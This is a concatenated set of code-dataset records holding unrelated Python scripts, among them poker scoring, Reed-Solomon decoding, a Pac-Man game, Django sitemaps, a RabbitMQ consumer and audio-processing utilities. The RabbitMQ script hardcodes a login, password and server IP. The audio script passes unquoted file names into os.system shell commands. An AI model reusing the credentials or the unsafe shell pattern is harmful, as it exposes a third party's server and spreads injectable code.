W_paris.append(i)\n else:\n W_one_cards.append(i)\n \n B_paris.sort(reverse = True)\n W_paris.sort(reverse = True)\n B_one_cards.sort(reverse = True)\n W_one_cards.sort(reverse = True)\n\n \n for i in range(len(B_paris)):\n if B_paris[i] > W_paris[i]:\n winner = B_pokers\n break\n elif B_paris[i] < W_paris[i]:\n winner = W_pokers\n break\n else:\n pass\n \n if winner == None:\n for i in range(len(B_one_cards)):\n if B_one_cards[i] > W_one_cards[i]:\n winner = B_pokers\n break\n elif B_one_cards[i] < W_one_cards[i]:\n winner = W_pokers\n break\n else:\n pass\n else:\n pass\n\n if winner == None:\n return 'Tie'\n else:\n return winner.name\n\n \n\n\n def cardCmp(self,B_pokers,W_pokers):\n\n B_cardsNumList = B_pokers.cardsNumList\n W_cardsNumList = W_pokers.cardsNumList\n\n winner = 'Tie'\n i = 4\n while i >= 0:\n if B_cardsNumList[i] < W_cardsNumList[i]:\n winner = W_pokers.name\n break\n elif B_cardsNumList[i] > W_cardsNumList[i]:\n winner = B_pokers.name\n break\n else:\n i -= 1\n return winner\n\n \n\n\n\n'''\npokers = pokers()\nprint(pokers.showPokersType(cards = '2H 3H 4H 5H 6H'))\n\nB_pokers =pokers('Black','2H 3H 6H 4H 5H')\nW_pokers =pokers('White','3D 7D 5D 6D 4D')\npokersCmp = pokersCmp()\nwinner = pokersCmp.cmp_ReturnWinnerName(B_pokers,W_pokers)\nprint(winner)\n\n'''\n\n\n\n","sub_path":"第3课-测试驱动开发-TexasHoldem/TexasHoldem.py","file_name":"TexasHoldem.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"486392342","text":"# an encoder and decoder for Reed-Solomon codes with coefficients in Z/p for a prime p\n# decoder uses the Berlekamp-Welch algorithm\n\n# for solving a linear system\nfrom linearsolver.linearsolver import someSolution\n\nfrom finitefield.finitefield import FiniteField\nfrom finitefield.polynomial import polynomialsOver\n\n\ndef makeEncoderDecoder(n, k, p):\n if not k <= n <= p:\n raise Exception(\"Must have k <= n <= p but instead had (n,k,p) == (%r, %r, %r)\" % (n,k,p))\n\n Fp = FiniteField(p)\n Poly = polynomialsOver(Fp)\n maxE = ((n - k) // 2) # maximum allowed number of errors\n\n # message is a list of integers at most p\n def encode(message):\n if not all(x < p for x in message):\n raise Exception(\"Message is improperly encoded as integers < p. 
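The pair, two-pair, and three-of-a-kind comparisons in the poker record above each re-derive rank counts from scratch. A compact alternative sketch for the within-category tie-breaks: rank a five-card hand by its sorted `(count, rank)` signature, so comparison collapses to a plain tuple comparison (hand encoding matches the record's "2H 3D ..." strings; category ordering such as straights vs. pairs still needs the existing type check first):

```python
from collections import Counter

NUM = {str(n): n for n in range(2, 10)}
NUM.update({"T": 10, "J": 11, "Q": 12, "K": 13, "A": 14})

def signature(cards):
    # "2H 2D 5S 5C 9H" -> [(2, 5), (2, 2), (1, 9)]: larger groups first,
    # then higher ranks, so positional tuple comparison breaks ties.
    ranks = [NUM[c[0]] for c in cards.split()]
    return sorted(((n, r) for r, n in Counter(ranks).items()), reverse=True)

a = signature("2H 2D 5S 5C 9H")  # two pair, fives over twos
b = signature("3H 3D 4S 4C 9H")  # two pair, fours over threes
print(a > b)                     # True: (2, 5) beats (2, 4) positionally
```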
It was:\\n%r\" % message)\n\n def row(i, b):\n return [Fp(i ** (j)) for j in range(k)] + [Fp(b)]\n system = [row(i, message[i]) for i in range(k)]\n \n interpolated = someSolution(system, freeVariableValue=1)\n thePoly = Poly(interpolated)\n print(\"Original message is:\")\n print(message)\n print(\"The polynomial encoding the message is:\")\n print(thePoly)\n return [thePoly(Fp(i)) for i in range(n)]\n\n\n def solveSystem(encodedMessage, debug=True):\n for e in range(maxE, 0, -1):\n ENumVars = e\n QNumVars = e+k\n def row(i, x, r):\n return ([r * x**j for j in range(ENumVars)] +\n [-1 * x**j for j in range(QNumVars)] +\n [-r * x**ENumVars]) # the \"extended\" part of the linear system\n\n system = ([row(i, a, b) for (i, (a,b)) in enumerate(encodedMessage)])\n # Add one more row in the end ensure coefficient of x^e in E(x) is 1\n\n if debug:\n print(\"\\nSystem of equations is:\\n\\n\")\n for row in system:\n print(\"\\t%r\" % (row,))\n\n solution = someSolution(system, freeVariableValue=1)\n E = Poly([solution[j] for j in range(ENumVars)] + [Fp(1)])\n Q = Poly([solution[j] for j in range(ENumVars, len(solution))])\n\n if debug:\n print(\"\\nReduced system is:\\n\\n\")\n for row in system:\n print(\"\\t%r\" % (row,))\n\n print(\"Solution is %r\" % (solution,))\n print(\"Q is %r\" % (Q,))\n print(\"E is %r\" % (E,))\n\n P, remainder = Q.__divmod__(E)\n if remainder == 0:\n return Q, E\n\n raise Exception(\"found no divisors!\")\n\n\n def decode(encodedMessage):\n encodedMessage = [[Fp(i), encodedMessage[i]] for i in range(len(encodedMessage))]\n Q,E = solveSystem(encodedMessage)\n\n Pcoefs, remainder = Q.__divmod__(E)\n if remainder != 0:\n raise Exception(\"Q is not divisibly by E!\")\n P = Poly(Pcoefs)\n print(\"Decoded polynomial r(x) = Q(x) / E(x) is: \")\n print(P)\n return [P(Fp(i)) for i in range(k)]\n \n\n\n return encode, decode, solveSystem\n","sub_path":"welchberlekamp.py","file_name":"welchberlekamp.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"303054472","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom maze import Maze\n\nclass MovableCharacter(object):\n \n lastSeenCounter = 10\n \n def canGo(self,direction):\n movement = Maze.Directions[direction]\n return not self.maze.isWall(int(self.x+self.speed*movement[0])%self.maze.height,int(self.y+self.speed*movement[1])%self.maze.width)\n \n def canMove(self):\n return not self.maze.isWall(int(self.x+self.speed*self.dx)%self.maze.height,int(self.y+self.speed*self.dy)%self.maze.width)\n \n def chase(self):\n if list(self.lastSeen) == []:\n return False\n if self.chasing == None or not(self.chasing in list(self.lastSeen.keys())):\n self.chasing = list(self.lastSeen.keys())[0]\n coord = self.lastSeen[self.chasing][0]\n direction = self.maze.direction(self.getCoordinates(),coord)\n self.setDirection(direction)\n \n def decreaseLastSeen(self):\n toDelete = []\n for ls in self.lastSeen.keys():\n self.lastSeen[ls][1] -= 1\n if self.lastSeen[ls][1]==0:\n toDelete.append(ls)\n for ls in toDelete:\n self.lastSeen.pop(ls)\n \n def getCoordinates(self):\n return (int(self.x),int(self.y))\n \n def getDirection(self):\n return Maze.ReverseDirections[(self.dx,self.dy)]\n\n def updateSeen(self, name, coord):\n self.lastSeen[name] = [coord,MovableCharacter.lastSeenCounter]\n\n def setDirection(self,direction):\n if not (direction is None):\n movement = Maze.Directions[direction]\n self.dx = movement[0]\n self.dy = movement[1]\n 
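Encoding in the Reed-Solomon record above boils down to evaluating a degree-(k-1) polynomial at n points over Z/p; the record interpolates so that the first k evaluations equal the message, while the sketch below uses the simpler message-symbols-as-coefficients convention just to make the evaluation step concrete (toy prime, plain integers, no field classes):

```python
def rs_encode(message, n, p):
    # Treat the k message symbols as coefficients of a degree-(k-1)
    # polynomial and evaluate it at x = 0..n-1 over Z/p.
    def poly_at(x):
        return sum(c * pow(x, j, p) for j, c in enumerate(message)) % p
    return [poly_at(x) for x in range(n)]

codeword = rs_encode([2, 3, 5], n=7, p=11)  # k=3 symbols -> 7 evaluations
print(codeword)  # any k error-free points recover the polynomial
```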
return True\n\n def setPosition(self,x,y):\n self.x = x\n self.y = y\n \n def display(self):\n pass\n\n def flee(self):\n pass\n \n def move(self):\n pass\n \n\n \nclass PacMan(MovableCharacter):\n \n def __init__(self,x,y,speed,maze,name=\"PacMan\"):\n self.name = name\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n self.speed = speed\n self.maze = maze\n self.lastSeen = {}\n self.seuilCloseDistance = 10\n self.chasing = None\n self.eatenPills = 0\n if (self.maze.takePill(self.x,self.y)) : self.eatenPills+=1\n self.hasPower = False\n \n def isAlone(self):\n closest,dist = self.maze.closestAmong(self.getCoordinates(),self.lastSeen)\n res = dist>self.seuilCloseDistance\n return res\n \n def gotoPill(self):\n coord1 = self.getCoordinates()\n coord2 = self.maze.closestPill(coord1)\n if coord2 is None:\n return False\n direction = self.maze.direction(coord1,coord2)\n self.setDirection(direction)\n return True\n\n def move(self):\n if self.canMove():\n self.x = (self.x+self.speed*self.dx)%self.maze.height\n self.y = (self.y+self.speed*self.dy)%self.maze.width\n if self.maze.takePill(int(self.x),int(self.y)):\n self.eatenPills += 1\n \n\nclass Ghost(MovableCharacter):\n \n def __init__(self,x,y,speed,maze,name=\"PacMan\"):\n self.name = name\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n self.speed = speed\n self.maze = maze\n self.lastSeen = {}\n self.chasing = None\n self.isEaten = False\n \n def isAlone(self):\n return list(self.lastSeen.keys())==[]\n \n def move(self):\n if self.canMove():\n self.x = (self.x+self.speed*self.dx)%self.maze.height\n self.y = (self.y+self.speed*self.dy)%self.maze.width","sub_path":"TP/TP3Sources/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"275564353","text":"import pika\r\nimport time\r\n#设置RabbitMq登录的用户名及密码\r\ncredentials = pika.PlainCredentials('newnew', 'rabbitmq123')\r\n#RabbitMq连接,只是连接一个Socket\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\r\n '182.61.17.151',credentials=credentials))\r\n#建立RabbitMQ协议的通道,实例化一个channel\r\nchannel = connection.channel()\r\n\r\n#声明hello的消息队列\r\nchannel.queue_declare(queue='hello')\r\n\r\n#ch是channel的实例,method发送消息是的信息,properties属性,body是消息(bytes格式)\r\ndef callback(ch, method, properties, body):\r\n print(\"received msg...start processing....\",body)\r\n# time.sleep(20)\r\n #print(\" [x] Received %r\" % ch,method, properties, body)\r\n print(\" [x] msg process done....\",body)\r\n\r\n#队列消费,queue队列名,callback表示一收到消息时调用函数\r\nchannel.basic_consume(callback,\r\n queue='hello',\r\n no_ack=True)\r\n\r\nprint(' [*] Waiting for messages. 
To exit press CTRL+C')\r\n# Start consuming\r\nchannel.start_consuming()\r\n# The consumer sends no acknowledgement back to the server for consumed messages\r\n","sub_path":"demo_rabbitmq/test_receive1.py","file_name":"test_receive1.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"503483195","text":"import re\r\nimport queue\r\n\r\n\r\nclass WhooziJuicy:\r\n\r\n    def __init__(self,people):\r\n        self.lists=people\r\n        \r\n    def Entry_Rules(self):\r\n        #sort by the digits next to the letter ***Elders must enter the premises first***\r\n        New_sorted_List=sorted(self.lists,key=lambda x:int(re.findall(r'\\d+$',x)[0]))\r\n        New_sorted_List.reverse()\r\n\r\n        #People must stand in a queue\r\n        Q_IN_queue=queue.Queue()\r\n\r\n        #order people of equal age by alphabet\r\n        for item in range(len(New_sorted_List)-1):\r\n            \r\n            \r\n            if int(New_sorted_List[item][1:])==int(New_sorted_List[item+1][1:]):\r\n                \r\n                array=[]\r\n                array.append(New_sorted_List[item])\r\n                array.append(New_sorted_List[item+1])\r\n\r\n                #sort by Alphabet\r\n                array.sort()\r\n                New_sorted_List[item]=array[0]\r\n                New_sorted_List[item+1]=array[1]\r\n                \r\n\r\n            \r\n        \r\n        for item in New_sorted_List:\r\n            #**No under 18 persons are allowed**\r\n            #select the age of the person and check if the person is allowed or not\r\n            if int(item[1:]) < 18 :\r\n                print (\"This person is not allowed \",item)\r\n            elif int(item[1:]) == 90 :\r\n                print (\"This nightclub is not able to assist this person\",item)\r\n            else:\r\n                #All those who are allowed\r\n                Q_IN_queue.put(item)\r\n            \r\n            \r\n        \r\n        while not Q_IN_queue.empty():\r\n            print(\"Person \",Q_IN_queue.get(),\"Enters the premises\")\r\n        \r\n        \r\n    \r\n    \r\n","sub_path":"KMC_Test/KMC.py","file_name":"KMC.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124523856","text":"from datetime import datetime\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom article.models import Article\nfrom photos.models import PhotoAlbum\nfrom .SitemapEntity import SitemapEntity\n\n\nclass Sitemap:\n    \"\"\"Class for generating the site map\"\"\"\n\n    siteHost = 'http://k-71.ru'\n\n    today_lastmod = ''\n\n    def __init__(self):\n        self.today_lastmod = datetime.today().strftime('%Y-%m-%d')\n\n    def generate(self):\n        resultSitemap = \"\"\"\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n        \"\"\"\n        siteRoot = SitemapEntity()\\\n            .set_priority(1.0)\\\n            .set_lastmod(self.today_lastmod)\\\n            .set_url(self.siteHost + '/')\\\n            .get()\n\n        resultSitemap += siteRoot\n        resultSitemap += self.get_albums_urls().strip()\n        resultSitemap += self.get_articles_urls().strip()\n        resultSitemap += self.get_static_urls().strip()\n\n        resultSitemap += '</urlset>'\n\n        f = open(settings.BASE_DIR + '/templates/sitemap.xml', 'w')\n        f.write(resultSitemap.strip())\n        f.close()\n\n    def get_static_urls(self):\n        urls = ''\n\n        static_urls = (\n            '/events/',\n            '/beginners/',\n            '/memorandum/'\n        )\n        \n        for url in static_urls:\n            urls += SitemapEntity()\\\n                .set_url(self.siteHost + url)\\\n                .set_lastmod(self.today_lastmod)\\\n                .set_priority(0.8)\\\n                .get()\n\n        return urls\n\n    def get_articles_urls(self):\n        urls = ''\n\n        urls += SitemapEntity()\\\n            .set_url(self.siteHost + reverse('article:index'))\\\n            .set_lastmod(self.today_lastmod)\\\n            .set_priority(0.8)\\\n            .get()\n\n        articlesResult = Article\\\n            .objects\\\n            .all()\\\n            .only('date', 'slug')\\\n            .order_by('-date')\n\n        for article in articlesResult:\n            urls += SitemapEntity()\\\n                .set_url(self.siteHost + reverse('article:detail', kwargs={'slug': 
article.slug}))\\\n                .set_lastmod(article.date.strftime('%Y-%m-%d'))\\\n                .set_priority(0.6)\\\n                .get()\n\n        return urls\n\n    def get_albums_urls(self):\n        urls = ''\n\n        urls += SitemapEntity()\\\n            .set_url(self.siteHost + reverse('albums:index'))\\\n            .set_lastmod(self.today_lastmod)\\\n            .set_priority(0.8)\\\n            .get()\n\n        articlesResult = PhotoAlbum\\\n            .objects\\\n            .all()\\\n            .only('date', 'slug')\\\n            .order_by('-date')\n\n        for article in articlesResult:\n            urls += SitemapEntity()\\\n                .set_url(self.siteHost + reverse('albums:detail', kwargs={'slug': article.slug}))\\\n                .set_lastmod(article.date.strftime('%Y-%m-%d'))\\\n                .set_priority(0.6)\\\n                .get()\n\n        return urls","sub_path":"classes/Sitemap/Sitemap.py","file_name":"Sitemap.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"230497712","text":"import sys\nimport random\nfrom optparse import OptionParser, OptionGroup\nimport collections\nimport pysam\n\n\nparser = OptionParser()\nparser.add_option(\"--bam\",dest=\"bam\",help=\"A bam file as input\")\n(options, args) = parser.parse_args()\n\n#file=\"/Volumes/Volume_4/analysis/pcr-non-pcr/bams/Dsim-PCRfree-rep1.filter.sort.bam\"\nfile=options.bam\ncounter=collections.defaultdict(lambda:0)\nsamfile = pysam.Samfile( file, \"rb\" )\nfor ar in samfile:\n    name1=samfile.getrname(ar.tid)\n    name2=samfile.getrname(ar.rnext)\n    #if not ar.is_read1:\n    #    continue\n    if name1 == name2:\n        continue # discard those with equal id\n\n    key=tuple(sorted([name1,name2]))\n    counter[key]+=1\n    \n\nitems=[(k[1],k[0]) for k in counter.items()]\nitems=reversed(sorted(items))\n\nfor i in items:\n    print(i[1],i[0])\n\n    ","sub_path":"users/robert/mapstat.py","file_name":"mapstat.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"651205173","text":"import datetime\n\n\ndef currentTime():\n    now = datetime.datetime.now()\n    currentTime = now.strftime(\"%Y-%m-%d %H:%M:%S\")\n    return currentTime\n\n\ndef check_expires(lastUpdate, expires):\n    if lastUpdate == 'Not found':\n        compare = True\n    else:\n        expires_format = datetime.datetime.strptime(\n            lastUpdate, \"%Y-%m-%d %H:%M:%S\")\n        compare_date = expires_format + datetime.timedelta(days=expires)\n        current_date = datetime.datetime.now()\n\n        compare = compare_date < current_date\n    # print(compare)\n    return compare  # compare result\n    # Returns True if expired or 'Not found'\n","sub_path":"cgu_crawl/getTime.py","file_name":"getTime.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"399587513","text":"\nimport pandas as pd#import pandas module as pd \nimport matplotlib.pyplot as plt #import plotting function\n#read a dataset\ncomp=pd.read_csv(\"C:\\\\Users\\\\jeeva\\\\Downloads\\\\R assignment\\\\decision tree\\\\Company_Data.csv\")\n#change bad=0 medium=1 good=2 in shelveloc column\ndef tochange(i):\n    if i=='Bad':\n        return 0\n    if i=='Medium':\n        return 1\n    if i=='Good':\n        return 2\ncomp['ShelveLoc']=comp['ShelveLoc'].apply(tochange)\n\n#convert salesRanges values to some unique values \ndef toconv(x):\n    if x=='[0-1.0]':\n        return 0\n    if x=='[1-2.0]':\n        return 1\n    if x=='[2-3.0]':\n        return 2\n    if x=='[3-4.0]':\n        return 3\n    if x=='[4-5.0]':\n        return 4\n    if x=='[5-6.0]':\n        return 5\n    if x=='[6-7.0]':\n        return 6\n    if x=='[7-8.0]':\n        return 7\n    if x=='[8-9.0]':\n        return 8\n    if x=='[9-10.0]':\n        return 9\n    if x=='[10-11.0]':\n        
return 10\n    if x=='[11-12.0]':\n        return 11\n    if x=='[12-13.0]':\n        return 12\n    if x=='[13-14.0]':\n        return 13\n    if x=='[14-15.0]':\n        return 14\n    if x=='[15-16.0]':\n        return 15\n    if x=='[16-17.0]':\n        return 16\n    \n#Change categorical to numerical\ncomp.Urban[comp.Urban=='Yes']=1\ncomp.Urban[comp.Urban=='No']=0\ncomp.US[comp.US=='Yes']=1\ncomp.US[comp.US=='No']=0\n\ncomp.Sales.max()\n#define the sales ranges\nSales_ranges=[\"[{0}-{1}]\".format(Sales,Sales+1.0)for Sales in range(0,17,1)]\nSales_ranges#we identify sales ranges\ncount_Sales_ranges=len(Sales_ranges)#count sales ranges\n\n#count the sales ranges values ex:[9-10.0]=53 counts [16-17.0]=2counts\ncomp['Salesranges_c']=pd.cut(x=comp['Sales'],bins=count_Sales_ranges,labels=Sales_ranges)\nSales_len=comp['Salesranges_c'].value_counts()\n\ncomp_range=pd.DataFrame(Sales_len).reset_index()\n#create a column with ranges and count values of sales_ranges\ncomp_range.columns=['Salesranges_c','count']\ncomp_range\n\n#plotting sales ranges values\nplt.bar(comp_range['Salesranges_c'],comp_range['count'])\nplt.show()\n\n#create column to change particular ranges to numerical for identifying\ncomp['Sales_out']=comp['Salesranges_c'].apply(toconv)#call toconv function\n#create a column changing numerical data to categorical data\ncomp['sale']=comp['Sales_out'].replace([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q'])\n#########Converted to Categorical datas#####\n\nimport numpy as np#for mathematical operation\nfrom sklearn.model_selection import train_test_split #split a train and test data\n#inputs are first and output as last in different dataframe\ncomp1=comp[['CompPrice','Income','Advertising','Population','Price','ShelveLoc','Age','Education','Urban','US','sale']]\ncolnames=list(comp1.columns)\npred=colnames[0:10] #predictor (input) columns\ntarg=colnames[10] #output as target\n\n#split the data \ntrain,test = train_test_split(comp1,test_size = 0.2)\n\n#import decision tree\nfrom sklearn.tree import DecisionTreeClassifier\n\n#model prepared by decision tree classifier \nmodel = DecisionTreeClassifier(criterion = 'entropy')\nmodel.fit(train[pred],train[targ]) #fit the model: inputs to output\npreds = model.predict(test[pred]) #predict a model with test input\npd.Series(preds).value_counts() #count predictions\n\npd.crosstab(test[targ],preds)#cross tab for mismatch function\nnp.mean(preds==test.sale) # 0.075 for gini: 0.1625 for entropy\n#I 13 #G 13 #J 11\n#E 8 #L 8 #F 6\n#K 4 #N 3 #A 3\n#C 3 #H 2 #M 2\n#D 2 #B 2","sub_path":"decision tree/com.py","file_name":"com.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"272348077","text":"\"\"\"shodai URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nimport notifications.urls\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.generic import TemplateView\nfrom django.templatetags.static import static as staticfiles\nfrom django.utils.translation import ugettext_lazy as _\nfrom material.admin.sites import site\nfrom graphene_django.views import GraphQLView\nfrom .schema import schema\n\n\n# optional\n###################################################\nsite.site_header = _('Shodai')\nsite.site_title = _('Shodai')\nsite.main_bg_color = '#088A3F'\nsite.login_bg_color = '#088A3F'\nsite.main_hover_color = 'black'\n\nsite.favicon = staticfiles('../static/others/favicon.ico')\nsite.profile_picture = staticfiles('../static/others/shodai-logo.png')\nsite.profile_bg = staticfiles('../static/others/white.jpg')\nsite.login_logo = staticfiles('../static/others/shodai-logo.png')\nsite.logout_bg = staticfiles('../static/others/white.jpg')\n##################################################\n\nurlpatterns = [\n path('', include('order.urls')),\n path('', include('customer_service.urls')),\n path('', include('product.urls')),\n path('', include('producer.urls')),\n path('', include('retailer.urls')),\n path('', include('user.urls')),\n path('', include('offer.urls')),\n path('', include('coupon.urls')),\n path('', include('utility.urls')),\n # path('', include('search.urls')),\n path('admins/', include('shodai_admin.urls')),\n path('admin/', include('material.admin.urls')),\n path('notifications/', include(notifications.urls, namespace='notifications')),\n path('ckeditor/', include('ckeditor_uploader.urls')),\n\n # Landing\n url(r'^$', TemplateView.as_view(template_name='landing/index.html')),\n url(r'^download/app', TemplateView.as_view(template_name='landing/download.html')),\n\n # Graphql\n url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True, schema=schema))),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","sub_path":"shodai/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"578035657","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 4 20:23:11 2021\n\n@author: JO20993\n\"\"\"\nclass AUV(object):\n def __init__(self, \n latlon=(0.0,0.0),\n depth=0.0,\n speed_knots=0.0,\n heading=0.0,\n rudder_position=0.0,\n engine_speed='STOP',\n engine_direction='AHEAD',\n datum=(0.0,0.0)):\n\n self.latlon = latlon\n self.depth = depth\n self.speed_knots = speed_knots\n self.heading = heading\n self.rudder_position = rudder_position\n self.engine_state = (engine_speed, engine_direction)\n\n self.__datum = datum\n \n def set_rudder(self, rudder):\n self.rudder_position = rudder","sub_path":"navigation_block/1_python_in_the_auv_challenge/3_object_oriented_programming/building_your_auv_step_2/BWSI_AUV.py","file_name":"BWSI_AUV.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"276106861","text":"import pandas as pd\nimport geopandas as gpd\nimport maup\n\n#load in precinct and district shapefiles\ncensus_blocks = 
gpd.read_file('/Users/hopecj/projects/AR/Shapefiles/oachita/GeoStor/Society.BLOCKS_TIGER_2010_polygon.shp')\nprecincts = gpd.read_file('/Users/hopecj/projects/AR/Shapefiles/oachita/ouachita_parnership 17/partnership_shapefiles_17v2_05103/PVS_17_v2_vtd_05103.shp')\n\n#make sure they are in the same CRS\nprecincts = precincts.to_crs(census_blocks.crs)\n\n#assign every census block to a precinct\nassignment = maup.assign(census_blocks, precincts)\ncensus_blocks['assignment'] = assignment\n\n# save file\ncensus_blocks.to_file('/Users/hopecj/projects/AR/Shapefiles/oachita/censusblocks_assigned.shp')\n\n####\n## # if you want to aggregate \n####\n\n#list variables you want to aggregate into precincts\nvariables = ['tot','hispanic']\n\n#sum block values by precinct\nprecincts[variables] = census_blocks[variables].groupby(assignment).sum()\n\n#check that totals match\nprec_total = census_blocks['tot'].sum()\nprint('old tot',prec_total)\nagg_total = precincts['tot'].sum()\nprint('new tot',agg_total)\n\n#save file\nprecincts.to_file('filename.shp')\n\ncsv = precincts.drop(['geometry'],axis = 1)\ncsv.to_csv('filename.csv')\n","sub_path":"General/MaupAssign_Aggregate.py","file_name":"MaupAssign_Aggregate.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"263131422","text":"import argparse\nimport pathlib\nimport os\nimport soundfile\n\n\ndef command():\n\tparser = argparse.ArgumentParser(description=\"help\")\n\tparser.add_argument('mode', choices=[\"wave\", \"spleeter\", \"conv_name\", \"short\"], help=\"select a mode\")\n\tparser.add_argument('--input', help=\"input music directory\")\n\tparser.add_argument('--output', help=\"output directory\")\n\t\n\targs = parser.parse_args()\n\treturn args\n\ndef main(args):\n\n\tif args.mode == \"wave\":\n\t\twave(args)\n\telif args.mode == \"spleeter\":\n\t\tspleeter(args)\n\telif args.mode == \"conv_name\":\n\t\tconv_name(args)\n\telif args.mode == \"short\":\n\t\tshort(args)\n\ndef wave(args):\n\t\"\"\"\n\tconvert files to wave\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\tfor file in files.iterdir():\n\t\tparent = str(file.parent)\n\t\tfilename = pathlib.PurePosixPath(file).stem\n\t\toutput_name = \"music\"+str(i).zfill(4)\n\t\tos.system(\"ffmpeg -i \"+str(pathlib.PurePath(parent,file.name))+\" -ar 24000 \"+str(pathlib.PurePath(parent,output_name))+\".wav\")\n\t\ti+=1\n\ndef spleeter(args):\n\t\"\"\"\n\trun spleeter\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\tfor file in files.iterdir():\n\t\tparent = str(file.parent)\n\t\tfilename = pathlib.PurePosixPath(file).stem\n\t\tif args.output is not None:\n\t\t\toutput_name = str(args.output)\n\t\telse:\n\t\t\toutput_name = \"music\"+str(i).zfill(4)\n\t\n\t\tprint(\"spleeter separate -i \"+str(pathlib.PurePath(parent,file.name))+\" -o \"+output_name+\" -p spleeter:5stems\")\n\t\tos.system(\"spleeter separate -i \"+str(pathlib.PurePath(parent,file.name))+\" -o \"+output_name+\" -p spleeter:5stems\")\n\t\ti+=1\n\ndef conv_name(args):\n\t\"\"\"\n\trename extracted vocal file\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\tfor file in files.iterdir():\n\t\tparent = str(pathlib.PurePath(file.parent, \"music\"+str(i).zfill(4)))\n\t\tfilename = pathlib.PurePosixPath(file).stem\n\t\toutput_name = 
str(pathlib.PurePath(args.output, \"music\"+str(i).zfill(4)+\".wav\"))\n\t\t# print(\"cp \"+str(pathlib.PurePath(parent,\"vocals.wav\"))+\" \"+str(output_name))\n\t\tos.system(\"cp \"+str(pathlib.PurePath(parent,\"vocals.wav\"))+\" \"+str(output_name))\n\t\t# os.system(\"cp \"+str(pathlib.PurePath(parent,file.name))+\" \"+str(output_name))\n\t\ti+=1\n\ndef short(args):\n\t\"\"\"\n\tseparate music into 20 sec\n\n\t:param args: The arguments\n\t:type args: { type_description }\n\t\"\"\"\n\tfiles = pathlib.Path(args.input)\n\ti = 1\n\t# for all files in the directory\n\tfor file in files.iterdir():\n\t\tinput_file = str(file)\n\t\tmusic = soundfile.SoundFile(input_file)\n\t\tlength = int(len(music) / music.samplerate)\n\t\t# separate music into 20 sec\n\t\tfor start in range(0, length, 20):\n\t\t\toutput_file = str(pathlib.PurePath(args.output, file.stem+\"_\"+str(start)+\".wav\"))\n\t\t\tos.system(\"ffmpeg -i \"+input_file+\" -ss \"+str(start)+\" -to \"+str(start+20 if start+20 < length else length)+\" -c copy \"+output_file)\n\t\ti+=1\n\n\n\nif __name__ == '__main__':\n\tmain(command())","sub_path":"music2wav.py","file_name":"music2wav.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"405068592","text":"from onjira import onjira_api\nimport requests\nfrom datetime import date, datetime, timedelta\nimport calendar\n\n\njira_api = onjira_api.JiraApi()\njira = jira_api.login()\n\n# Business lines\nproduct_ks = ' (店铺平台 = 快手) ) '\nproduct_jd = '(店铺平台 = 京东))'\n\n# Resolving department\nteam_ks = '(解决部门 ~ 快手)'\nteam_jd = '(解决部门 ~ 京东)'\n\n# 3. Feishu bot 